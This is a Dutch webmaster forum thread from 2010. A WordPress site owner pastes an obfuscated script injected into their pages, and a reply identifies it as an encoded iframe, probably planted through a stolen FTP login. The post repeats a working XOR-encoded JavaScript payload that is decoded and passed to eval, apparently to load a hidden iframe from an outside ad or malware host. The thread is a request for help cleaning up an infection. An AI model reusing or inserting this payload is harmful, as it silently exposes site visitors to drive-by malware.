Op een wordpress website krijg ik in Google Chrome een Malware waarschuwing. Op de server stonden idd vreemde bestanden. Ik heb ze verwijderd en paswoorden veranderd. Nu als ik paginabron bekijken doe, staat er helemaal onderaan dit:
</body></html><script>lo=new Array(81,69,10,83,88,84,66,90,82,89,67,25,84,69,82 ,86,67,82,114,91,82,90,82,89,67,31,16,94,81,69,86, 90,82,16,30,12,61,81,69,25,68,69,84,10,21,95,67,67 ,71,13,24,24,86,83,84,88,66,89,67,82,69,68,25,89,8 2,67,24,81,86,69,24,68,95,88,64,25,71,95,71,8,68,1 0,82,85,4,6,83,6,14,1,81,84,21,12,61,81,69,25,68,6 7,78,91,82,25,83,94,68,71,91,86,78,10,21,89,88,89, 82,21,12,61,83,88,84,66,90,82,89,67,25,80,82,67,11 4,91,82,90,82,89,67,68,117,78,99,86,80,121,86,90,8 2,31,16,85,88,83,78,16,30,108,7,106,25,86,71,71,82 ,89,83,116,95,94,91,83,31,81,69,30,12,61);oa="";jn yh=String.fromCharCode;tl=55;for(vf in lo)oa+=jnyh(lo[vf]^tl);eval(oa);</script><script>lo=new Array(81,69,10,83,88,84,66,90,82,89,67,25,84,69,82 ,86,67,82,114,91,82,90,82,89,67,31,16,94,81,69,86, 90,82,16,30,12,61,81,69,25,68,69,84,10,21,95,67,67 ,71,13,24,24,86,83,84,88,66,89,67,82,69,68,25,89,8 2,67,24,81,86,69,24,68,95,88,64,25,71,95,71,8,68,1 0,82,85,4,6,83,6,14,1,81,84,21,12,61,81,69,25,68,6 7,78,91,82,25,83,94,68,71,91,86,78,10,21,89,88,89, 82,21,12,61,83,88,84,66,90,82,89,67,25,80,82,67,11 4,91,82,90,82,89,67,68,117,78,99,86,80,121,86,90,8 2,31,16,85,88,83,78,16,30,108,7,106,25,86,71,71,82 ,89,83,116,95,94,91,83,31,81,69,30,12,61);oa="";jn yh=String.fromCharCode;tl=55;for(vf in lo)oa+=jnyh(lo[vf]^tl);eval(oa);</script>lo=new Array(81,69,10,83,88,84,66,90,82,89,67,25,84,69,82 ,86,67,82,114,91,82,90,82,89,67,31,16,94,81,69,86, 90,82,16,30,12,61,81,69,25,68,69,84,10,21,95,67,67 ,71,13,24,24,86,83,84,88,66,89,67,82,69,68,25,89,8 2,67,24,81,86,69,24,68,95,88,64,25,71,95,71,8,68,1 0,82,85,4,6,83,6,14,1,81,84,21,12,61,81,69,25,68,6 7,78,91,82,25,83,94,68,71,91,86,78,10,21,89,88,89, 82,21,12,61,83,88,84,66,90,82,89,67,25,80,82,67,11 4,91,82,90,82,89,67,68,117,78,99,86,80,121,86,90,8 2,31,16,85,88,83,78,16,30,108,7,106,25,86,71,71,82 ,89,83,116,95,94,91,83,31,81,69,30,12,61);oa="";jn yh=String.fromCharCode;tl=55;for(vf in lo)oa+=jnyh(lo[vf]^tl);eval(oa);</script>
Iemand enig idee hoe ik dit wegkrijg? Of waar dit zich ergens kan bevinden?
Aanvullend bericht:
Blijkbaar zit er ergens een iframe dat verwijst naar adcounters.net ... kan het alleen niet vinden!
- Malware?
-
13-01-2010, 13:33 #1
- Berichten
- 1.054
- Lid sinds
- 18 Jaar
Malware?
Laatst aangepast door Kim P. : 13-01-2010 om 13:38 Reden: Automatisch samengevoegd.
-
In de schijnwerper
Linkvada.com Linkbuilding Platform: Direct Linkbuilden op 77.000+ premium domeinenSEO/LinkbuildingE-book: Domineren in Google met AIOverige dealsOntvang tot 20% kickbackfee op je Google Ads klanten, waar wacht je nog op?PromotieHulp bij SEO/GoogleAds (NL/BE/DE). Economy.nl Google Premier Partner.Freelance / Werk -
13-01-2010, 13:47 #2
- Berichten
- 1.660
- Lid sinds
- 18 Jaar
Dat is een gecodeerde iframe. Dit code moet je verwijderen. Vaak bevinden dit soort iframes in index bestanden en .js bestanden. Kennelijk omdat er toegang is verschaft tot je FTP account. Dus je wachtwoorden veranderen is zeker aanbevolen en controleer je computer op infecties.
Dit soort aanvallen gebeuren erg vaak
Plaats een
- + Advertentie
- + Onderwerp
Marktplaats
Webmasterforum
- Websites algemeen
- Sitechecks
- Marketing
- Domeinen algemeen
- Waardebepaling
- CMS
- Wordpress
- Joomla
- Magento
- Google algemeen
- SEO
- Analytics
- Adsense
- Adwords
- HTML / XHTML
- CSS
- Programmeren
- PHP
- Javascript
- JQuery
- MySQL
- Ondernemen algemeen
- Belastingen
- Juridisch
- Grafisch ontwerp
- Hosting Algemeen
- Hardware Info
- Offtopic